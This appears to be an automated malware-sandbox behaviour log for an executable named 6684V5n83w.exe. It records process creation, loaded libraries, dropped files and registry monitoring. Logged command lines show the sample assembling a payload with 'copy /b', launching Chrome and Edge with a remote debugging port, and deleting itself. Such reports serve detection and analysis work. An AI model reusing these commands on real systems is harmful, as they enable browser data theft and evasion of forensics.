Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Delivering + ..\Wisdom + ..\Spare + ..\Earrings + ..\Grey + ..\Bus + ..\Project l	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com Evans.com l	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com" & rd /s /q "C:\ProgramData\kno8y" & exit	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2068,i,3099484482751593606,10427139142014003377,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2692 --field-trial-handle=2548,i,2148176420882130604,12860696726209298526,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=2012,i,13447073896792857968,5768153646567357744,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6860 --field-trial-handle=2012,i,13447073896792857968,5768153646567357744,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7024 --field-trial-handle=2012,i,13447073896792857968,5768153646567357744,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll

Source: C:\Users\user\Desktop\6684V5n83w.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Google Drive.lnk.17.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.17.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.17.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.17.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.17.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.17.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 6684V5n83w.exe

Static file information: File size 1160471 > 1048576

Source: 6684V5n83w.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\6684V5n83w.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: 6684V5n83w.exe

Static PE information: real checksum: 0x127cc4 should be: 0x127d64

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com

Jump to dropped file

Boot Survival

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Users\user\Desktop\6684V5n83w.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\timeout.exe TID: 2468

Thread sleep count: 90 > 30

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\6684V5n83w.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\6684V5n83w.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\6684V5n83w.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
